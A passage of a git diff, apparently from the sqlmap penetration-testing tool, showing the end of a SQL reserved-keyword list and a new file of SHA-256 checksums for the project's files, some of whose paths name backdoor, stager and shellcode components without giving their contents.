+PERCENTILE_CONT +PERCENTILE_DISC +PERCENT_RANK +PERIOD +PERMUTE +PLACING +PORTION +POSITION +POSITION_REGEX +POWER +PRECEDES +PRECISION +PREPARE +PRIMARY +PROCEDURE +PTF +RANGE +RANK +READS +REAL +RECURSIVE +REF +REFERENCES +REFERENCING +REGR_AVGX +REGR_AVGY +REGR_COUNT +REGR_INTERCEPT +REGR_R2 +REGR_SLOPE +REGR_SXX +REGR_SXY +REGR_SYY +RELEASE +RESULT +RETURN +RETURNING +RETURNS +REVOKE +RIGHT +ROLLBACK +ROLLUP +ROW +ROWS +ROW_NUMBER +RUNNING +SAVEPOINT +SCOPE +SCROLL +SEARCH +SECOND +SEEK +SELECT +SENSITIVE +SESSION_USER +SET +SHOW +SIMILAR +SIN +SINH +SKIP +SMALLINT +SOME +SPECIFIC +SPECIFICTYPE +SQL +SQLEXCEPTION +SQLSTATE +SQLWARNING +SQRT +START +STATIC +STDDEV_POP +STDDEV_SAMP +SUBMULTISET +SUBSET +SUBSTRING +SUBSTRING_REGEX +SUCCEEDS +SUM +SYMMETRIC +SYSTEM +SYSTEM_TIME +SYSTEM_USER +TABLE +TABLESAMPLE +TAN +TANH +THEN +TIME +TIMESTAMP +TIMEZONE_HOUR +TIMEZONE_MINUTE +TO +TRAILING +TRANSLATE +TRANSLATE_REGEX +TRANSLATION +TREAT +TRIGGER +TRIM +TRIM_ARRAY +TRUE +TRUNCATE +UESCAPE +UNION +UNIQUE +UNKNOWN +UNMATCHED +UNNEST +UPDATE +UPPER +USER +USING +VALUE +VALUES +VALUE_OF +VARBINARY +VARCHAR +VARIADIC +VARYING +VAR_POP +VAR_SAMP +VERBOSE +VERSIONING +WHEN +WHENEVER +WHERE +WIDTH_BUCKET +WINDOW +WITH +WITHIN +WITHOUT +XML +XMLAGG +XMLATTRIBUTES +XMLBINARY +XMLCAST +XMLCOMMENT +XMLCONCAT +XMLDOCUMENT +XMLELEMENT +XMLEXISTS +XMLFOREST +XMLITERATE +XMLNAMESPACES +XMLPARSE +XMLPI +XMLQUERY +XMLSERIALIZE +XMLTABLE +XMLTEXT +XMLVALIDATE +YEAR + +# Misc + +ORD +MID diff --git a/data/txt/sha256sums.txt b/data/txt/sha256sums.txt new file mode 100644 index 00000000000..623d6e697bf --- /dev/null +++ b/data/txt/sha256sums.txt @@ -0,0 +1,637 @@ +e70317eb90f7d649e4320e59b2791b8eb5810c8cad8bc0c49d917eac966b0f18 data/procs/mssqlserver/activate_sp_oacreate.sql +6a2de9f090c06bd77824e15ac01d2dc11637290cf9a5d60c00bf5f42ac6f7120 data/procs/mssqlserver/configure_openrowset.sql +798f74471b19be1e6b1688846631b2e397c1a923ad8eca923c1ac93fc94739ad data/procs/mssqlserver/configure_xp_cmdshell.sql +5dfaeac6e7ed4c3b56fc75b3c3a594b8458effa4856c0237e1b48405c309f421 data/procs/mssqlserver/create_new_xp_cmdshell.sql +3c8944fbd4d77b530af2c72cbabeb78ebfb90f01055a794eede00b7974a115d0 data/procs/mssqlserver/disable_xp_cmdshell_2000.sql +afb169095dc36176ffdd4efab9e6bb9ed905874469aac81e0ba265bc6652caa4 data/procs/mssqlserver/dns_request.sql +657d56f764c84092ff4bd10b8fcbde95c13780071b715df0af1bc92b7dd284f2 data/procs/mssqlserver/enable_xp_cmdshell_2000.sql +1b7d521faca0f69a62c39e0e4267e18a66f8313b22b760617098b7f697a5c81d data/procs/mssqlserver/run_statement_as_user.sql +9b8b6e430c705866c738dd3544b032b0099a917d91c85d2b25a8a5610c92bcdf data/procs/mysql/dns_request.sql +02b7ef3e56d8346cc4e06baa85b608b0650a8c7e3b52705781a691741fc41bfb data/procs/mysql/write_file_limit.sql +02be5ce785214cb9cac8f0eab10128d6f39f5f5de990dea8819774986d0a7900 data/procs/oracle/dns_request.sql +606fe26228598128c88bda035986281f117879ac7ff5833d88e293c156adc117 data/procs/oracle/read_file_export_extension.sql +4d448d4b7d8bc60ab2eeedfe16f7aa70c60d73aa6820d647815d02a65b1af9eb data/procs/postgresql/dns_request.sql +7e3e28eac7f9ef0dea0a6a4cdb1ce9c41f28dd2ee0127008adbfa088d40ef137 data/procs/README.txt +519431a555205974e7b12b5ecb8d6fb03a504fbb4a6a410db8874a9bfcff6890 data/shell/backdoors/backdoor.asp_ +fbb0e5456bc80923d0403644371167948cefc8e95c95a98dc845bc6355e3718f data/shell/backdoors/backdoor.aspx_ +01695090da88b7e71172e3b97293196041e452bbb7b2ba9975b4fac7231e00a5 data/shell/backdoors/backdoor.cfm_ +03117933dcc9bfc24098e1e0191195fc4bafb891f0752edee28be1741894e0e5 data/shell/backdoors/backdoor.jsp_ +2505011f6dcf4c1725840ce495c3b3e4172217286f5ce2a0819c7a64ce35d9df data/shell/backdoors/backdoor.php_ +a08e09c1020eae40b71650c9b0ac3c3842166db639fdcfc149310fc8cf536f64 data/shell/README.txt +a4d49b7c1b43486d21f7d0025174b45e0608f55c110c6e9af8148478daec73d1 data/shell/stagers/stager.asp_ +1b21206f9d35b829fdf9afa17ea5873cd095558f05e644d56b39d560dfa62b6e data/shell/stagers/stager.aspx_ +8a149f77137fc427e397ec2c050e4028d45874234bc40a611a00403799e2dc0b data/shell/stagers/stager.cfm_ +c3a595fc1746ee07dbc0592ba7d5e207e6110954980599f63b8156d1d277f8ca data/shell/stagers/stager.jsp_ +82bcebc46ed3218218665794197625c668598eb7e861dd96e4f731a27b18a701 data/shell/stagers/stager.php_ +eb86f6ad21e597f9283bb4360129ebc717bc8f063d7ab2298f31118275790484 data/txt/common-columns.txt +63ba15f2ba3df6e55600a2749752c82039add43ed61129febd9221eb1115f240 data/txt/common-files.txt +9610fbd4ede776ab60d003c0ea052d68625921a53cdcfa50a4965b0985b619ca data/txt/common-outputs.txt +44047281263ef297f27fdd8fa98a0b0438a25989f897ce184cb0e2e442fb6c11 data/txt/common-tables.txt +ccba96624a0176b4c5acd8824db62a8c6856dafa7d32424807f38efed22a6c29 data/txt/keywords.txt +522cce0327de8a5dfb5ade505e8a23bbd37bcabcbb2993f4f787ccdecf24997e data/txt/smalldict.txt +6c07785ff36482ce798c48cc30ce6954855aadbe3bfac9f132207801a82e2473 data/txt/user-agents.txt +9c2d6a0e96176447ab8758f8de96e6a681aa0c074cd0eca497712246d8f410c6 data/txt/wordlist.tx_ +e3007876d35a153d9a107955fad3f6c338d3733210317b1f359417e8297595aa data/udf/mysql/linux/32/lib_mysqludf_sys.so_ +77f7e7b6cfde4bae8d265f81792c04c4d2b2966328cbf8affb4f980dec2b9d91 data/udf/mysql/linux/64/lib_mysqludf_sys.so_ +52b41ab911f940c22b7490f1d80f920c861e7a6c8c25bb8d3a765fd8af0c34a0 data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ +ea6592dbe61e61f52fd6ab7082722733197fa8f3e6bec0a99ca25aff47c15cff data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ +c58dd9b9fa27df0a730802bd49e36a5a3ccd59611fc1c61b8e85f92e14ac2a88 data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ +b6fdcfcafbbc5da34359604a69aaa9f8459a7e6e319f7b2ee128e762e84d1643 data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ +8d22d8b06ce253ae711c6a71b4ed98c7ad5ad1001a3dafb30802ec0b9b325013 data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ +812374d50a672a9d07faba1be9a13cfb84a369894dc7c702991382bb9558be9d data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ +5b816a33d9c284e62f1ea707e07b10be5efd99db5762d7bd60c6360dd2e70d8f data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ +cf5b9986fd70f6334bd00e8efcf022571089b8384b650245fb352ec18e48acdf data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ +445c05dac6714a64777892a372b0e3c93eee651162a402658485c48439390ad2 data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ +1c86d2358c20384ac92d333444b955a01ee97f28caac35ed39fdb654d5f93c1b data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ +050ff4692a04dc00b7e6ac187a56be47b5a654ccf907ffa9f9446194763ae7e5 data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ +7806d4c6865c7ebed677ae8abe302ca687c8f9f5b5287b89fed27a36beeeb232 data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ +cfa2a8fc26430cbc11ad0bd37609c753d4ca1eecb0472efe3518185d2d13e7cf data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ +d2210ad9260bd22017acc519a576595306842240f24d8b4899a23228a70f78c6 data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ +6311d919f6ff42c959d0ce3bc6dd5cb782f79f77857e9ab3bd88c2c365e5f303 data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ +4520fc47ea6e0136e03ba9b2eb94161da328f340bf6fbebad39ca82b3b3e323b data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ +bad0bb94ec75b2912d8028f7afdfd70a96c8f86cbc10040c72ece3fd5244660d data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ +b8132a5fe67819ec04dbe4e895addf7e9f111cfe4810a0c94b68002fd48b5deb data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ +03f3b12359a1554705eab46fb04dba63086beb5e2b20f97b108164603efdcb65 data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ +e5be1341a84b1a14c4c648feec02418acb904cd96d7cf0f66ec3ff0c117baf91 data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ +28113b48848ba7d22955a060a989f5ae4f14183b1fc64b67898095610176098c data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ +1187045f66f101c89678791960dc37ca5663cf4190ca7dc550753f028ec61a88 data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ +2259cd7e3f6ff057bbbb6766efc6818a59dbf262bfadefd9fda31746903c7501 data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ +1fdb0856443b56bf9e3e8c7d195171327217af745ad2e299c475d96892a07ec9 data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ +21e274e6c49cc444d689cb34a83497f982ed2b2850cab677dc059aea9e397870 data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ +6707132e4e812ad23cc22ff26e411e89f1eb8379a768161b410202c5442ff3ea data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ +0989c0c0143fb515a12a8b5064f014c633d13a8841aeceaf02ff46901f17805f data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ +3a492e9a1da0799d1107aa5949538303d06409c9a0ed00499626a08083d486ee data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ +3eab7d90606c3c0a9a88e1475e6d8d7d787b3b109c7e188cb9cb8b5561a6766e data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ +a1fe84c5b409366c3926f3138189fb17e7388ef09594a47c9d64e4efe9237a4b data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ +7368a6301369a63e334d829a1d7f6e0b55a824a9f1579dfeb7ced5745994ebc6 data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ +0a6d5fc399e9958477c8a71f63b7c7884567204253e0d2389a240d83ed83f241 data/udf/README.txt +288592bbc7115870516865d5a92c2e1d1d54f11a26a86998f8829c13724e2551 data/xml/banner/generic.xml +2adcdd08d2c11a5a23777b10c132164ed9e856f2a4eca2f75e5e9b6615d26a97 data/xml/banner/mssql.xml +14b18da611d4bfad50341df89f893edf47cd09c41c9662e036e817055eaa0cfb data/xml/banner/mysql.xml +6d1ab53eeac4fae6d03b67fb4ada71b915e1446a9c1cc4d82eafc032800a68fd data/xml/banner/oracle.xml +9f4ca1ff145cfbe3c3a903a21bf35f6b06ab8b484dad6b7c09e95262bf6bfa05 data/xml/banner/postgresql.xml +86da6e90d9ccf261568eda26a6455da226c19a42cc7cd211e379cab528ec621e data/xml/banner/server.xml +146887f28e3e19861516bca551e050ce81a1b8d6bb69fd342cc1f19a25849328 data/xml/banner/servlet-engine.xml +8af6b979b6e0a01062dc740ae475ba6be90dc10bb3716a45d28ada56e81f9648 data/xml/banner/set-cookie.xml +a7eb4d1bcbdfd155383dcd35396e2d9dd40c2e89ce9d5a02e63a95a94f0ab4ea data/xml/banner/sharepoint.xml +e2febc92f9686eacf17a0054f175917b783cc6638ca570435a5203b03245fc18 data/xml/banner/x-aspnet-version.xml +3a440fbbf8adffbe6f570978e96657da2750c76043f8e88a2c269fe9a190778c data/xml/banner/x-powered-by.xml +0223157364ea212de98190e7c6f46f9d2ee20cf3d17916d1af16e857bb5dc575 data/xml/boundaries.xml +02a7f6d6a0e023c3f087f78ab49cfb99e81df2b42e32718f877d90ab220486dc data/xml/errors.xml +d0b094a110bccec97d50037cc51445191561c0722ec53bf2cebe1521786e2451 data/xml/payloads/boolean_blind.xml +88b8931a6d19af14e44a82408c250ed89295947575bbf3ff3047da1d37d1a1c1 data/xml/payloads/error_based.xml +b0f434f64105bd61ab0f6867b3f681b97fa02b4fb809ac538db382d031f0e609 data/xml/payloads/inline_query.xml +0648264166455010921df1ec431e4c973809f37ef12cbfea75f95029222eb689 data/xml/payloads/stacked_queries.xml +997556b6170964a64474a2e053abe33cf2cf029fb1acec660d4651cc67a3c7e1 data/xml/payloads/time_blind.xml +40a4878669f318568097719d07dc906a19b8520bc742be3583321fc1e8176089 data/xml/payloads/union_query.xml +a2a2d3f8bf506f27ab0847ad4daa1fc41ca781dd58b70d2d9ac1360cf8151260 data/xml/queries.xml +0f5a9c84cb57809be8759f483c7d05f54847115e715521ac0ecf390c0aa68465 doc/AUTHORS +ce20a4b452f24a97fde7ec9ed816feee12ac148e1fde5f1722772cc866b12740 doc/CHANGELOG.md +c8d5733111c6d1e387904bc14e98815f98f816f6e73f6a664de24c0f1d331d9b doc/THANKS.md +d7e38b213c70fe519fff2e06a9fd0dcfb1d8bed7787e37916cd14faaf002e167 doc/THIRD-PARTY.md +25012296e8484ea04f7d2368ac9bdbcded4e42dbc5e3373d59c2bb3e950be0b8 doc/translations/README-ar-AR.md +c25f7d7f0cc5e13db71994d2b34ada4965e06c87778f1d6c1a103063d25e2c89 doc/translations/README-bg-BG.md +e85c82df1a312d93cd282520388c70ecb48bfe8692644fe8dbbf7d43244cda41 doc/translations/README-bn-BD.md +00b327233fac8016f1d6d7177479ab3af050c1e7f17b0305c9a97ecdb61b82c9 doc/translations/README-ckb-KU.md +f0bd369125459b81ced692ece2fe36c8b042dc007b013c31f2ea8c97b1f95c32 doc/translations/README-de-DE.md +163f1c61258ee701894f381291f8f00a307fe0851ddd45501be51a8ace791b44 doc/translations/README-es-MX.md +70d04bf35b8931c71ad65066bb5664fd48062c05d0461b887fdf3a0a8e0fab1d doc/translations/README-fa-IR.md +a55afae7582937b04bedf11dd13c62d0c87dedae16fcbcbd92f98f04a45c2bdf doc/translations/README-fr-FR.md +f4b8bd6cc8de08188f77a6aa780d913b5828f38ca1d5ef05729270cf39f9a3b8 doc/translations/README-gr-GR.md +bb8ca97c1abf4cf2ba310d858072276b4a731d2d95b461d4d77e1deca7ccbd8e doc/translations/README-hr-HR.md +27ecf8e38762b2ef5a6d48e59a9b4a35d43b91d7497f60027b263091acb067c6 doc/translations/README-id-ID.md +830a33cddd601cb1735ced46bbad1c9fbf1ed8bea1860d9dfa15269ef8b3a11c doc/translations/README-in-HI.md +40fc19ac5e790ee334732dd10fd8bd62be57f2203bd94bbd08e6aa8e154166e2 doc/translations/README-it-IT.md +379a338a94762ff485305b79afaa3c97cb92deb4621d9055b75142806d487bf5 doc/translations/README-ja-JP.md +754ce5f3be4c08d5f6ec209cc44168521286ce80f175b9ca95e053b9ec7d14d2 doc/translations/README-ka-GE.md +2e7cda0795eee1ac6f0f36e51ce63a6afedc8bbdfc74895d44a72fd070cf9f17 doc/translations/README-ko-KR.md +c161d366c1fa499e5f80c1b3c0f35e0fdeabf6616b89381d439ed67e80ed97eb doc/translations/README-nl-NL.md +95298c270cc3f493522f2ef145766f6b40487fb8504f51f91bc91b966bb11a7b doc/translations/README-pl-PL.md +b904f2db15eb14d5c276d2050b50afa82da3e60da0089b096ce5ddbf3fdc0741 doc/translations/README-pt-BR.md +3ed5f7eb20f551363eed1dc34806de88871a66fee4d77564192b9056a59d26ec doc/translations/README-rs-RS.md +7d5258bcd281ee620c7143598c18aba03454438c4dc00e7de3f4442d675c2593 doc/translations/README-ru-RU.md +bc15e7db466e42182e4bf063919c105327ff1b0ccd0920bb9315c76641ffd71a doc/translations/README-sk-SK.md +ab7d86319a68392caac23d8d7870d182d31fb8b33b24e84ba77c8119dbd194c2 doc/translations/README-tr-TR.md +5e313398bfe2573c83e25cfc5ff4c003fdbf9244aa611597a7084f7ac11cc405 doc/translations/README-uk-UA.md +c3a53e041ce868b4098c02add27ea3abaf6c9ecf73da61339519708ada6d4f24 doc/translations/README-vi-VN.md +c4590a37dc1372be29b9ba8674b5e12bcda6ab62c5b2d18dab20bcb73a4ffbeb doc/translations/README-zh-CN.md +8c4b528855c2391c91ec1643aeff87cae14246570fd95dac01b3326f505cd26e extra/beep/beep.py +509276140d23bfc079a6863e0291c4d0077dea6942658a992cbca7904a43fae9 extra/beep/beep.wav +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/beep/__init__.py +676a764f77109f29c310d7f9424c381516f71944e910efabbc95601af1e49a48 extra/cloak/cloak.py +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/cloak/__init__.py +6879b01859b2003fbab79c5188fce298264cd00300f9dcecbe1ffd980fe2e128 extra/cloak/README.txt +4b6d44258599f306186a24e99d8648d94b04d85c1f2c2a442b15dc26d862b41e extra/dbgtool/dbgtool.py +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/dbgtool/__init__.py +a777193f683475c63f0dd3916f86c4b473459640c3278ff921432836bc75c47f extra/dbgtool/README.txt +b7557edb216f65056d359cd48f3191a642cf3a1838a422a67ffbef17b58535d7 extra/icmpsh/icmpsh.exe_ +4838389bf1ceac806dff075e06c5be9c0637425f37c67053a4361a5f1b88a65c extra/icmpsh/icmpsh-m.c +8c38efaaf8974f9d08d9a743a7403eb6ae0a57b536e0d21ccb022f2c55a16016 extra/icmpsh/icmpsh-m.pl +12014ddddc09c58ef344659c02fd1614157cfb315575378f2c8cb90843222733 extra/icmpsh/icmpsh_m.py +6359bfef76fb5c887bb89c2241f6d65647308856f8d3ce3e10bf3fdde605e120 extra/icmpsh/icmpsh-s.c +ab6ee3ee9f8600e39faecfdaa11eaa3bed6f15ccef974bb904b96bf95e980c40 extra/icmpsh/__init__.py +27af6b7ec0f689e148875cb62c3acb4399d3814ba79908220b29e354a8eed4b8 extra/icmpsh/README.txt +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/__init__.py +191e3e397b83294082022de178f977f2c59fa99c96e5053375f6c16114d6777e extra/runcmd/README.txt +53d98136e508330e3adad43e4a3b0ebc5143c79f0ee7bce5dacf92cb8f7a17fd extra/runcmd/runcmd.exe_ +70bd8a15e912f06e4ba0bd612a5f19a6b35ed0945b1e370f9b8700b120272d8f extra/runcmd/src/README.txt +baecf66c52fe3c39f7efa3a70f9d5bd6ea8f841abd8da9e6e11bdc80a995b3ae extra/runcmd/src/runcmd/runcmd.cpp +a24d2dc1a5a8688881bea6be358359626d339d4a93ea55e8b756615e3608b8dd extra/runcmd/src/runcmd/runcmd.vcproj +16d4453062ba3806fe6b62745757c66bf44748d25282263fe9ef362487b27db0 extra/runcmd/src/runcmd.sln +d4186cac6e736bdfe64db63aa00395a862b5fe5c78340870f0c79cae05a79e7d extra/runcmd/src/runcmd/stdafx.cpp +e278d40d3121d757c2e1b8cc8192397e5014f663fbf6d80dd1118443d4fc9442 extra/runcmd/src/runcmd/stdafx.h +38f59734b971d1dc200584936693296aeebef3e43e9e85d6ec3fd6427e5d6b4b extra/shellcodeexec/linux/shellcodeexec.x32_ +b8bcb53372b8c92b27580e5cc97c8aa647e156a439e2306889ef892a51593b17 extra/shellcodeexec/linux/shellcodeexec.x64_ +cfa1f8d02f815c4e8561f6adbdd4e84dda6b6af6c7a0d5eeb9d7346d07e1e7ad extra/shellcodeexec/README.txt +980c03585368a124a085c9f35154f550f945d356ceb845df82b2734e9ad9830b extra/shellcodeexec/windows/shellcodeexec.x32.exe_ +384805687bfe5b9077d90d78183afcbd4690095dfc4cc12b2ed3888f657c753c extra/shutils/autocompletion.sh +a86533e9f9251f51cd3a657d92b19af4ec4282cd6d12a2914e3206b58c964ee0 extra/shutils/blanks.sh +cfd91645763508ba5d639524e1448bac64d4a1a9f2b1cf6faf7a505c97d18b55 extra/shutils/drei.sh +dd5141a5e14a5979b3d4a733016fafe241c875e1adef7bd2179c83ca78f24d26 extra/shutils/duplicates.py +0d5f32aa26b828046b851d3abeb8a5940def01c6b15db051451241435b043e10 extra/shutils/junk.sh +74fe683e94702bef6b8ea8eebb7fc47040e3ef5a03dec756e3cf4504a00c7839 extra/shutils/newlines.py +fed05c468af662ba6ca6885baf8bf85fec1e58f438b3208f3819ad730a75a803 extra/shutils/postcommit-hook.sh +ca86d61d3349ed2d94a6b164d4648cff9701199b5e32378c3f40fca0f517b128 extra/shutils/precommit-hook.sh +3893c13c6264dd71842a3d2b3509dd8335484f825b43ed2f14f8161905d1b214 extra/shutils/pycodestyle.sh +0525e3f6004eb340b8a1361072a281f920206626f0c8f6d25e67c8cef7aee78a extra/shutils/pydiatra.sh +763240f767c3d025cefb70dede0598c134ea9a520690944ae16a734e80fd98a0 extra/shutils/pyflakes.sh +d12fd5916e97b2034ba7fbfa8da48f590dc10807119b97a9d27347500c610c2d extra/shutils/pypi.sh +df768bcb9838dc6c46dab9b4a877056cb4742bd6cfaaf438c4a3712c5cc0d264 extra/shutils/recloak.sh +1972990a67caf2d0231eacf60e211acf545d9d0beeb3c145a49ba33d5d491b3f extra/shutils/strip.sh +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/vulnserver/__init__.py +9e5e4d3d9acb767412259895a3ee75e1a5f42d0b9923f17605d771db384a6f60 extra/vulnserver/vulnserver.py +b8411d1035bb49b073476404e61e1be7f4c61e205057730e2f7880beadcd5f60 lib/controller/action.py +e376093d4f6e42ee38b050af329179df9c1c136b7667b2f1cb559f5d4b69ebd9 lib/controller/checks.py +430475857a37fd997e73a47d7485c5dd4aa0985ef32c5a46b5e7bff01749ba66 lib/controller/controller.py +56e03690c1b783699c9f30cb2f8cc743d3716aba8137e6b253b21d1dd31a4314 lib/controller/handler.py +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/controller/__init__.py +2a96190ced25d8929861b13866101812fcadf5cac23dd1dd4b29b1a915918769 lib/core/agent.py +b13462712ec5ac07541dba98631ddcda279d210b838f363d15ac97a1413b67a2 lib/core/bigarray.py +3b2ca69b7a2e07f6db2fed2651c19e401f62e2068ea3b5f8f96ebf0ff067f349 lib/core/common.py +a6397b10de7ae7c56ed6b0fa3b3c58eb7a9dbede61bf93d786e73258175c981e lib/core/compat.py +a9997e97ebe88e0bf7efcf21e878bc5f62c72348e5aba18f64d6861390a4dcf2 lib/core/convert.py +c03dc585f89642cfd81b087ac2723e3e1bb3bfa8c60e6f5fe58ef3b0113ebfe6 lib/core/data.py +ca06a0e9d66a58e74ef994d53f9b3cd2ebaed98735bbab99854054235a8083d6 lib/core/datatype.py +70fb2528e580b22564899595b0dff6b1bc257c6a99d2022ce3996a3d04e68e4e lib/core/decorators.py +147823c37596bd6a56d677697781f34b8d1d1671d5a2518fbc9468d623c6d07d lib/core/defaults.py +6b366f897e66b9df39df2ee45fef77d46efb7a2d4e294440d3aa7dc1b2f4cedf lib/core/dicts.py +a033f92d136c707a25927c2383125ddb004d4283db62c004dcd67c3fc242bb1c lib/core/dump.py +1abf1edeacb85eaf5cffd35fcbde4eee2da6f5fc722a8dc1f9287fb55d138418 lib/core/enums.py +5387168e5dfedd94ae22af7bb255f27d6baaca50b24179c6b98f4f325f5cc7b4 lib/core/exception.py +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/core/__init__.py +914a13ee21fd610a6153a37cbe50830fcbd1324c7ebc1e7fc206d5e598b0f7ad lib/core/log.py +02a2264324caa249154e024a01bcd7cc40dbca4d647d5d10a50654b4415a6d77 lib/core/optiondict.py +c1cb56f2a43e9f2f6b25d5f3d504e856ea21df6fc14af5e37b1000feef2bdb5a lib/core/option.py +8171f6ee33e7742f06bb3014a28324496374beddee7b378ace10a26414a97762 lib/core/patch.py +49c0fa7e3814dfda610d665ee02b12df299b28bc0b6773815b4395514ddf8dec lib/core/profiling.py +03db48f02c3d07a047ddb8fe33a757b6238867352d8ddda2a83e4fec09a98d04 lib/core/readlineng.py +48797d6c34dd9bb8a53f7f3794c85f4288d82a9a1d6be7fcf317d388cb20d4b3 lib/core/replication.py +0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py +888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py +1418691b5449412e60c693b6afc2f12b00051c1e280d2261762a36f094e0da66 lib/core/settings.py +cd5a66deee8963ba8e7e9af3dd36eb5e8127d4d68698811c29e789655f507f82 lib/core/shell.py +bcb5d8090d5e3e0ef2a586ba09ba80eef0c6d51feb0f611ed25299fbb254f725 lib/core/subprocessng.py +d35650179816193164a5f177102f18379dfbe6bb6d40fbb67b78d907b41c8038 lib/core/target.py +ddf8c5a3dbebd6cdf8b8ba4417e36652d1e040f025175cb6487f1aebc0208836 lib/core/testing.py +b5b65f018d6ef4b1ceeebbc50d372e07d4733267c9f3f4b13062efd065e847b6 lib/core/threads.py +b9aacb840310173202f79c2ba125b0243003ee6b44c92eca50424f2bdfc83c02 lib/core/unescaper.py +10719f5ca450610ad28242017b2d8a77354ca357ffa26948c5f62d20cac29a8b lib/core/update.py +ec11fd5a3f4efd10a1cae288157ac6eb6fb75da4666d76d19f6adf74ac338b5a lib/core/wordlist.py +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/__init__.py +54bfd31ebded3ffa5848df1c644f196eb704116517c7a3d860b5d081e984d821 lib/parse/banner.py +a9f10a558684778bdb00d446cb88967fc1bfd413ae6a5f4bd582b3ea442baa87 lib/parse/cmdline.py +02d82e4069bd98c52755417f8b8e306d79945672656ac24f1a45e7a6eff4b158 lib/parse/configfile.py +c5b258be7485089fac9d9cd179960e774fbd85e62836dc67cce76cc028bb6aeb lib/parse/handler.py +5c9a9caee948843d5537745640cc7b98d70a0412cc0949f59d4ebe8b2907c06c lib/parse/headers.py +1ad9054cd8476a520d4e2c141085ae45d94519df5c66f25fac41fe7d552ab952 lib/parse/html.py +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/parse/__init__.py +d2e771cdacef25ee3fdc0e0355b92e7cd1b68f5edc2756ffc19f75d183ba2c73 lib/parse/payloads.py +80d26a30abe948faf817a14f746cc8b3e2341ea8286830cccaae253b8ac0cdff lib/parse/sitemap.py +1be3da334411657461421b8a26a0f2ff28e1af1e28f1e963c6c92768f9b0847c lib/request/basicauthhandler.py +a1c638493ecdc5194db7186bbfed815c6eed2344f2607cac8c9fa50534824266 lib/request/basic.py +bc61bc944b81a7670884f82231033a6ac703324b34b071c9834886a92e249d0e lib/request/chunkedhandler.py +2daf0ce19eacda64687f441c90ef8da51714c3e8947c993ba08fb4ecdc4f5287 lib/request/comparison.py +f83140c85be7f572f83c4ab4279fa1d8601243210cdfe4a44b2fc218befbcffd lib/request/connect.py +8e06682280fce062eef6174351bfebcb6040e19976acff9dc7b3699779783498 lib/request/direct.py +cf019248253a5d7edb7bc474aa020b9e8625d73008a463c56ba2b539d7f2d8ec lib/request/dns.py +f56fc33251bd6214e3a6316c8f843eb192b2996aa84bd4c3e98790fdcf6e8cf0 lib/request/httpshandler.py +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/request/__init__.py +aeeeb5f0148078e30d52208184042efc3618d3f2e840d7221897aae34315824e lib/request/inject.py +ada4d305d6ce441f79e52ec3f2fc23869ee2fa87c017723e8f3ed0dfa61cdab4 lib/request/methodrequest.py +43a7fdf64e7ba63c6b2d641c9f999a63c12ac23b43b64fedfce4e05b863de568 lib/request/pkihandler.py +b90feeb16e89a844427df42373b0139eb6f6cf3c48ccec32b3e3a3f540c2451e lib/request/rangehandler.py +47a97b264fb588142b102d18100030ce333ce372c677b97ed6cb04105c6c9d30 lib/request/redirecthandler.py +1bf93c2c251f9c422ecf52d9cae0cd0ff4ea2e24091ee6d019c7a4f69de8e5eb lib/request/templates.py +01600295b17c00d4a5ada4c77aa688cfe36c89934da04c031be7da8040a3b457 lib/takeover/abstraction.py +d3c93562d78ebdaf9e22c0ea2e4a62adb12f0ce9e9d9631c1ea000b1a07d04ab lib/takeover/icmpsh.py +1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/takeover/__init__.py +12e729e4828b7e1456ca41dae60cb4d7eca130a8b4c4885dd0f5501dcbda7fe4 lib/takeover/metasploit.py +f522436fbd14bdab090a1d305fcac0361800cb8e36c8cbcb47933298376a71e0 lib/takeover/registry.py +f6e5d6e2ff368fa39943b2302982f33c47eb9a12d01419bef50fcf934b2bce34 lib/takeover/udf.py 